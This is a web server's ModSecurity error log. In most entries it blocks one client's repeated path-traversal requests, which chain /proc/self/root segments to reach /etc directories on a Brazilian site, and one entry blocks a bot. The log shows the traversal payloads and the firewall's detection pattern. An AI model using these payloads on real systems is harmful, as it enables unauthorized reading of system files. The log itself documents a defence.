[Mon Mar 16 14:31:48.508269 2026] [:error] [pid 21533:tid 140411599251200] [client 74.7.241.46:40800] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-hHjZBu2q05ozVU9jIAAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:31:49.783015 2026] [:error] [pid 21533:tid 140411666392832] [client 74.7.241.46:40808] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-hXjZBu2q05ozVU9jJAAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:31:51.163070 2026] [:error] [pid 15061:tid 140411641214720] [client 74.7.241.46:40818] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-h6TCbgAP5jq5Teg1DwAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:31:52.548313 2026] [:error] [pid 15568:tid 140411658000128] [client 74.7.241.46:40828] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-iKQpVkWug9HeOt8_aAAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:31:54.017493 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.241.46:40830] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-ilajLEzk2WiQ-10b4AAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:31:57.396273 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.241.46:40838] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-jdSswJuvopo3lOhooAAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:31:58.698433 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:43952] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-jrysWC90G-1nBrBNsgAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:31:59.902865 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.241.46:43954] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-j5qj1wV0Si-Okef4JAAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:01.222237 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.241.46:43968] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-kdSswJuvopo3lOhooQAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:02.508122 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.241.46:43970] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-kqQpVkWug9HeOt8_aQAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:05.942777 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.241.46:43982] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-lZqj1wV0Si-Okef4KAAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:07.272064 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.241.46:43984] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-l6TCbgAP5jq5Teg1EQAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:08.593370 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.228.16:48022] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg-mNSswJuvopo3lOhoogAAAIo"]
[Mon Mar 16 14:32:15.259217 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.241.46:35494] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-n46lpbStxTqkSkt1rQAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:16.651638 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.241.46:35496] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-oHjZBu2q05ozVU9jVAAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:19.410643 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.241.46:35500] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-o6TCbgAP5jq5Teg1FAAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:20.737886 2026] [:error] [pid 21533:tid 140411599251200] [client 74.7.241.46:43120] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-pHjZBu2q05ozVU9jXgAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:22.083559 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.241.46:43132] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-prysWC90G-1nBrBNtwAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:23.214433 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.241.46:43138] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-p6TCbgAP5jq5Teg1FQAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:24.575383 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.241.46:43152] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-qLysWC90G-1nBrBNuQAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:27.265496 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.241.46:43154] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-q3jZBu2q05ozVU9jawAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:28.928060 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.241.46:33728] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-rHjZBu2q05ozVU9jcQAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
